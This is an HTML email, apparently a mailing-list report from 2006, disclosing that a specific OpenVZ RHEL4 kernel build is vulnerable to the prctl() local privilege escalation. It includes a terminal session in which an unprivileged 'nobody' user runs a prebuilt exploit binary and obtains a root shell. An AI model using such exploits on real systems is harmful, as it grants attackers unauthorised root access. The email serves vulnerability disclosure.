<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=us-ascii">
<META content="MSHTML 6.00.2800.1561" name=GENERATOR></HEAD>
<BODY>
<DIV><FONT face=Arial size=2><SPAN
class=798423601-12102006>Hi,</SPAN></FONT></DIV>
<DIV><FONT face=Arial size=2><SPAN
class=798423601-12102006></SPAN></FONT> </DIV>
<DIV><FONT face=Arial size=2><SPAN class=798423601-12102006>
The latest RHEL4 kernel for OpenVZ ((2.6.9-023stab016.2) available
at <A
href="http://openvz.org/download/kernel/rhel4/">http://openvz.org/download/kernel/rhel4/</A> <STRONG>is
vulnerable to the PRCTL exploit</STRONG>: <A
href="http://isc.sans.org/diary.php?storyid=1482">http://isc.sans.org/diary.php?storyid=1482</A></SPAN></FONT></DIV>
<DIV><FONT face=Arial size=2><SPAN
class=798423601-12102006></SPAN></FONT> </DIV>
<DIV><FONT face=Arial size=2><SPAN class=798423601-12102006>example session of
"nobody" running the exploit and getting a root shell:</SPAN></FONT></DIV>
<DIV><FONT face=Arial size=2><SPAN
class=798423601-12102006></SPAN></FONT> </DIV>
<DIV><FONT face=Arial size=2><SPAN class=798423601-12102006>[root@mailin-02node
tmp]# uname -a<BR>Linux mailin-02node.elitehosts.com 2.6.9-023stab016.2 #1 Thu
Aug 10 23:39:42 MSD 2006 i686 i686 i386 GNU/Linux</SPAN></FONT></DIV>
<DIV><FONT face=Arial size=2><SPAN class=798423601-12102006>[root@mailin-02node
tmp]# su nobody<BR>bash-3.00$ ls -ld 05<BR>-rwxr-xr-x 1 nobody nobody
13298 Oct 11 21:42 05<BR>bash-3.00$ ./05</SPAN></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2><SPAN class=798423601-12102006>prctl() suidsafe
exploit</SPAN></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2><SPAN class=798423601-12102006>(C) Julien
TINNES</SPAN></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2><SPAN class=798423601-12102006>[+] Installed signal
handler<BR>[+] We are suidsafe dumpable!<BR>[+] Malicious string forged<BR>[+]
Segfaulting child<BR>[+] Waiting for exploit to succeed (~26 seconds)<BR>[+]
getting root shell<BR>sh-3.00# whoami<BR>root<BR>sh-3.00# uname -a<BR>Linux
mailin-02node.elitehosts.com 2.6.9-023stab016.2 #1 Thu Aug 10 23:41:42 MSD 2006
i686 i686 i386 GNU/Linux<BR>sh-3.00#</SPAN></FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>---------------------------</FONT></DIV>
<DIV><FONT face=Arial size=2>Avi Brender</FONT></DIV>
<DIV><FONT face=Arial size=2><A
href="mailto:abrender@elitehosts.com">abrender@elitehosts.com</A></FONT></DIV>
<DIV><FONT face=Arial size=2>Elite Hosts, Inc</FONT></DIV>
<DIV><FONT face=Arial
size=2>-------------------------------------------------------</FONT></DIV>
<DIV><FONT face=Arial size=2>WARNING !!! This email message is for the sole use
of the intended recipient(s) and may contain confidential and privileged
information. Any unauthorized review; use, disclosure or distribution is
prohibited, and could result in criminal prosecution. If you are not the
intended recipient, please contact the sender by reply email and destroy all
copies of the original message. This message is private and is considered a
confidential exchange - public disclosure of this electronic message or its
contents are prohibited.<BR>----------------------</FONT></DIV>
<DIV> </DIV></BODY></HTML>